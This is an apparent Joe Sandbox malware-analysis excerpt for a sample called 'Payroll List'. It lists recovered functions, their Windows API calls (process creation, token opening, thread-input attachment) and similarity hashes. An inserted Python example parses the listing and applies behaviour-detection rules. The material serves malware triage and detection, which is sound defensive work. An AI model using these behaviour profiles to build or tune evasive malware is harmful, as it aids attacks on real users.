                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                    • String ID:
                                                                    • API String ID: 4217664535-0
                                                                    • Opcode ID: 0177b2937c48c57ffb7de9aa4b3c95ef4a152082ab50b62f0ec2f0a871a8b477
                                                                    • Instruction ID: 53507f2aa4e37cebb0a1a10246d35ef293a8607350e8040c05d7fff44bb9db30
                                                                    • Opcode Fuzzy Hash: 0177b2937c48c57ffb7de9aa4b3c95ef4a152082ab50b62f0ec2f0a871a8b477
                                                                    • Instruction Fuzzy Hash: 4B119171A04205EFDB049F94ED85AAEB7A9EF85305F14802DE9539B650D731AE88CB20
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0015B498
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015B4AA
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015B4C0
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0015B4DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 5a374859c28a992cd969cf3c52e971f8c4defb6280221e53172b35a0e0e6129b
                                                                    • Instruction ID: 181b96450487975716bc345c452d1a74d97326821cb7ac3d1740cf900c0c9b37
                                                                    • Opcode Fuzzy Hash: 5a374859c28a992cd969cf3c52e971f8c4defb6280221e53172b35a0e0e6129b
                                                                    • Instruction Fuzzy Hash: 5C115A7A900218FFDB21DFA8C885E9DBBB4FB08700F204091EA15BB290D771AE10DB94
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0013B5A5
                                                                    • GetClientRect.USER32(?,?), ref: 0019E69A
                                                                    • GetCursorPos.USER32(?), ref: 0019E6A4
                                                                    • ScreenToClient.USER32(?,?), ref: 0019E6AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: e1d8463b2bd659345fb6c288e019a8fbc1189db69bd14c51c6790b54f247de78
                                                                    • Instruction ID: 5207cc7d90f1160a6d961f4462febba28461ef8b4f34b82a2d01908d1c528020
                                                                    • Opcode Fuzzy Hash: e1d8463b2bd659345fb6c288e019a8fbc1189db69bd14c51c6790b54f247de78
                                                                    • Instruction Fuzzy Hash: 6E115A71A00129BFCF10DF94DC858EE77B8EF0A304F000451FA02E7540E334AA81CBA1
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00167352
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00167385
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0016739B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001673A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: aac207a178d2723626ff03b3af93d64d2828609c90a7699d25ac7a80522e9d9e
                                                                    • Instruction ID: 55efa80d69c5b94c0e494ed82243e20ff811e4011419b9af33b917de42e207d7
                                                                    • Opcode Fuzzy Hash: aac207a178d2723626ff03b3af93d64d2828609c90a7699d25ac7a80522e9d9e
                                                                    • Instruction Fuzzy Hash: E71104B2A04245AFC7019BA8EC49AAE7BADAB45324F144315F925E37A1D7708D908BA0
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                    • GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 90a62097a86a7af49a02383e47f8eeff1d09b0c01394468265e24eaa3397fa6e
                                                                    • Instruction ID: 966b349f981f34a5dffe93693cd48819613383179e7c2f65d3b703ffbd70f2f5
                                                                    • Opcode Fuzzy Hash: 90a62097a86a7af49a02383e47f8eeff1d09b0c01394468265e24eaa3397fa6e
                                                                    • Instruction Fuzzy Hash: 4611AD72501509BFEF164FA0FC50EEABB69FF19364F050115FA0552450D731DDA09BA0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                    • Instruction ID: 8e3c6d0223a69f39136860aa2330b9b681448e0eeb2f6e2d412898ed37e18bd7
                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                    • Instruction Fuzzy Hash: FD014E3200014AFBCF165E84DC568EE3F23FB18356B598455FE2859131D33ADAB5AB81
                                                                    APIs
                                                                      • Part of subcall function 00147A0D: __getptd_noexit.LIBCMT ref: 00147A0E
                                                                    • __lock.LIBCMT ref: 0014748F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 001474AC
                                                                    • _free.LIBCMT ref: 001474BF
                                                                    • InterlockedIncrement.KERNEL32(00D245D0), ref: 001474D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 2704283638-0
                                                                    • Opcode ID: 712ba64591e19171f872a7b3df9d7ced66676d32d698c7d04f6d08f33f1ee1c0
                                                                    • Instruction ID: 437694cdae4f23014865fb92268d3e1cbefa3a69d2f7c95996b712885c459843
                                                                    • Opcode Fuzzy Hash: 712ba64591e19171f872a7b3df9d7ced66676d32d698c7d04f6d08f33f1ee1c0
                                                                    • Instruction Fuzzy Hash: C901563590AA11ABD712EF64A50576DBB60BF15710F194006F41477AF0CB345981CFD6
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00147AD8
                                                                      • Part of subcall function 00147CF4: __mtinitlocknum.LIBCMT ref: 00147D06
                                                                      • Part of subcall function 00147CF4: EnterCriticalSection.KERNEL32(00000000,?,00147ADD,0000000D), ref: 00147D1F
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00147AE5
                                                                    • __lock.LIBCMT ref: 00147AF9
                                                                    • ___addlocaleref.LIBCMT ref: 00147B17
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1687444384-0
                                                                    • Opcode ID: f1970cdcfda1658320eb4957c14c5c08ba4a0c68e57216e07813663559a1adcf
                                                                    • Instruction ID: 039d36747b556d3f2339eea11e106eac7c36586e110d82d28f6613783587f9e6
                                                                    • Opcode Fuzzy Hash: f1970cdcfda1658320eb4957c14c5c08ba4a0c68e57216e07813663559a1adcf
                                                                    • Instruction Fuzzy Hash: 38016971505B00EFD720DF75D90674ABBF0EF60325F20890EE49A976E0CBB0A680CB42
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0018E33D
                                                                    • _memset.LIBCMT ref: 0018E34C
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3D00,001E3D44), ref: 0018E37B
                                                                    • CloseHandle.KERNEL32 ref: 0018E38D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    • Opcode ID: e099abf2ca022ab217a400eb07d307987d67a87993948d9b036a100b65bf7b9a
                                                                    • Instruction ID: 3abfffd9d8718afbccf2ca926d1ac50d30fb65db7d200a345c11f52d3c8f96d8
                                                                    • Opcode Fuzzy Hash: e099abf2ca022ab217a400eb07d307987d67a87993948d9b036a100b65bf7b9a
                                                                    • Instruction Fuzzy Hash: 8DF0B4F05003447AE2012BE1AC49F7B7E5DFB09750F404021BF04EB5A2D3715E4086A4
                                                                    APIs
                                                                      • Part of subcall function 0013AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013AFE3
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013AFF2
                                                                      • Part of subcall function 0013AF83: BeginPath.GDI32(?), ref: 0013B009
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013B033
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018EA8E
                                                                    • LineTo.GDI32(00000000,?,?), ref: 0018EA9B
                                                                    • EndPath.GDI32(00000000), ref: 0018EAAB
                                                                    • StrokePath.GDI32(00000000), ref: 0018EAB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: 2cb06deafbc58465a90964a0a91d1338361f04126b77a3968e03a6431221d58c
                                                                    • Instruction ID: ada475924383a3a0e30e4a413434ecc33d9fcb2aad720decde2ce0a0c67f6cf5
                                                                    • Opcode Fuzzy Hash: 2cb06deafbc58465a90964a0a91d1338361f04126b77a3968e03a6431221d58c
                                                                    • Instruction Fuzzy Hash: 2EF08231005659BBDB12AF94BD0DFCE3F59AF1B711F044101FA12658E187B456A2CB95
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015C84A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0015C85D
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0015C864
                                                                    • AttachThreadInput.USER32(00000000), ref: 0015C86B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: e59e5807f0033bf0ab3bd6b81355bb9d3cae1716d4363fae12da52b60faca79d
                                                                    • Instruction ID: 7afcbe317de88095649ca7a3526a20ec43aed9b55cb6fda887a29f2bbf3701dc
                                                                    • Opcode Fuzzy Hash: e59e5807f0033bf0ab3bd6b81355bb9d3cae1716d4363fae12da52b60faca79d
                                                                    • Instruction Fuzzy Hash: 01E03971141628BADB201FA2AC0DEDB7F5CEF167A2F408021BA1E88861C7B18584CBE0
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0015B0D6
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0015AC9D), ref: 0015B0DD
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0015AC9D), ref: 0015B0EA
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0015AC9D), ref: 0015B0F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: 6bf2b1d4c8969e170b96dfce4eeadc8c28a0fb07a70a486939d91e987463fdd9
                                                                    • Instruction ID: 19069ee188362b0221443feddd3dc0d9448805e7c3e6a528b33f822f590e1b3e
                                                                    • Opcode Fuzzy Hash: 6bf2b1d4c8969e170b96dfce4eeadc8c28a0fb07a70a486939d91e987463fdd9
                                                                    • Instruction Fuzzy Hash: DAE08672601211EBD7201FB16D0DB473BA8EF56792F018818F653DA880DB348486C760
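                                                                    The function blocks above list, per recovered function, the Windows APIs it calls (for example CreateProcessW followed by CloseHandle, SendMessageTimeoutW together with AttachThreadInput, and the OpenThreadToken / OpenProcessToken pair) plus a "Similarity" key. The Python below is an added example and is not part of the Joe Sandbox report or of Joe Sandbox's own code: it parses that listing format, applies three behaviour rules to each block's API set (including a check of CreateProcessW's dwCreationFlags for CREATE_SUSPENDED, which does not fire here because the page shows 0x20, NORMAL_PRIORITY_CLASS), and reconstructs the "API ID" key from the API names. The reconstruction (CamelCase split, a stoplist of dropped fragments, frequency groups joined by "$") is inferred from the IDs printed on this page and is an assumption about how the key is built; the rule names and the sample text are this example's own, with the sample lines copied from the blocks above.

```python
"""Parse Joe Sandbox function-block listings ('APIs' / 'Similarity' sections) and
flag blocks whose API set matches a behaviour rule. Added example, not Joe Sandbox code."""
import re
from collections import Counter

# Constructed sample: three blocks copied from this report, in the page's layout.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0018E33D
• _memset.LIBCMT ref: 0018E34C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3D00,001E3D44), ref: 0018E37B
• CloseHandle.KERNEL32 ref: 0018E38D
Memory Dump Source
• Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015C84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0015C85D
• GetCurrentThreadId.KERNEL32 ref: 0015C864
• AttachThreadInput.USER32(00000000), ref: 0015C86B
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
APIs
• GetCurrentThread.KERNEL32 ref: 0015B0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,0015AC9D), ref: 0015B0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0015AC9D), ref: 0015B0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,0015AC9D), ref: 0015B0F1
Similarity
• API ID: CurrentOpenProcessThreadToken
"""

# One API line: optional 'Part of subcall function X:' prefix, Name.MODULE, optional
# (args), then 'ref: ADDR'. Joe prints '?' for an argument it could not resolve.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S*)\s*$")

# Fragments the report's API ID appears to drop (inferred from this page; an assumption).
NOISE = {"Get", "Set", "Ex", "W", "Id", "For", "Sys", "Bk", "DC", "Ext", "To", "End", "Pen"}
CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit that marks a suspended start


def parse_blocks(text):
    """Split the listing at each 'APIs' header; return one dict per function block."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "api_id": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [] if m["args"] is None else m["args"].split(",")
            cur["calls"].append({"name": m["name"], "module": m["module"],
                                 "args": args, "ref": int(m["ref"], 16)})
            continue
        m = API_ID_RE.match(line)
        if m:
            cur["api_id"] = m["id"]
    return blocks


def hex_arg(text):
    """Rendered argument -> int, or None for Joe's unresolved '?' placeholder."""
    text = text.strip()
    return None if text == "?" else int(text, 16)


def rule_hits(block):
    """Behaviour rules over one block's API names and (best-effort) arguments."""
    names = {c["name"] for c in block["calls"]}
    hits = []
    if {"OpenProcessToken", "OpenThreadToken"} & names:
        hits.append("token-access")
    if "AttachThreadInput" in names and "SendMessageTimeoutW" in names:
        hits.append("input-queue-attach")
    for c in block["calls"]:
        if c["name"] == "CreateProcessW":
            hits.append("process-spawn")
            # dwCreationFlags is CreateProcessW's 6th parameter (standard argument order).
            flags = hex_arg(c["args"][5]) if len(c["args"]) >= 6 else None
            if flags is not None and flags & CREATE_SUSPENDED:
                hits.append("process-spawn-suspended")
    return hits


def api_id(calls):
    """Reconstruct the 'API ID' key: split CamelCase API names (CRT names starting with
    '_' stay whole), drop NOISE fragments, group fragments by occurrence count (most
    frequent first, groups joined by '$'), ASCII-sort each group. Inferred, not Joe's code."""
    counts = Counter()
    for c in calls:
        name = c["name"]
        frags = [name] if name.startswith("_") else re.findall(r"[A-Z][a-z]+|[A-Z]+(?![a-z])", name)
        counts.update(f for f in frags if f not in NOISE)
    groups = {}
    for frag, n in counts.items():
        groups.setdefault(n, []).append(frag)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def analyse(text):
    """Per block: reconstructed API ID, the ID the report printed, and rule hits."""
    return [{"api_id": api_id(b["calls"]), "reported": b["api_id"], "hits": rule_hits(b)}
            for b in parse_blocks(text)]


if __name__ == "__main__":
    for r in analyse(SAMPLE):
        print(r["api_id"], "ok" if r["api_id"] == r["reported"] else "MISMATCH", r["hits"])
```

                                                                    The reconstructed key matches the three IDs printed on this page; because it ignores addresses and argument values, it is the right kind of key for clustering the same AutoIt runtime function across builds, whereas the rule hits are what an analyst would triage first.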
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 0013B496
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0013B4A0
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0013B4B5
                                                                    • GetStockObject.GDI32(00000005), ref: 0013B4BD
                                                                    • GetWindowDC.USER32(?,00000000), ref: 0019DE2B
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0019DE38
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0019DE51
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0019DE6A
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0019DE8A
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0019DE95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: f50a1130fc4ee024d5f86b8dfdcfca6165714857841eed4bc9b466def6af7458
                                                                    • Instruction ID: 4704dce707ac7d66db0e783178a978f43ed873b19f9ec45210250dc4a4055135
                                                                    • Opcode Fuzzy Hash: f50a1130fc4ee024d5f86b8dfdcfca6165714857841eed4bc9b466def6af7458
                                                                    • Instruction Fuzzy Hash: 7BE0ED71504640AEDF215F74BC49BD83B11AB52335F14C666F66A588E2C77145C1DB11
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 3000ae026fc23f6bd2af963b339878bf2fa6ff418d44c72e5106f8b8c3730a49
                                                                    • Instruction ID: 6d680134118b454880e15ce89fede85f16538171d72ce8dd4ded7a4b51bd3b06
                                                                    • Opcode Fuzzy Hash: 3000ae026fc23f6bd2af963b339878bf2fa6ff418d44c72e5106f8b8c3730a49
                                                                    • Instruction Fuzzy Hash: C3E046B1500704EFDB005FB0E848A2E7BA8EB4D360F12C80AFC5F8BA10CB7498808B40
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0015B2DF
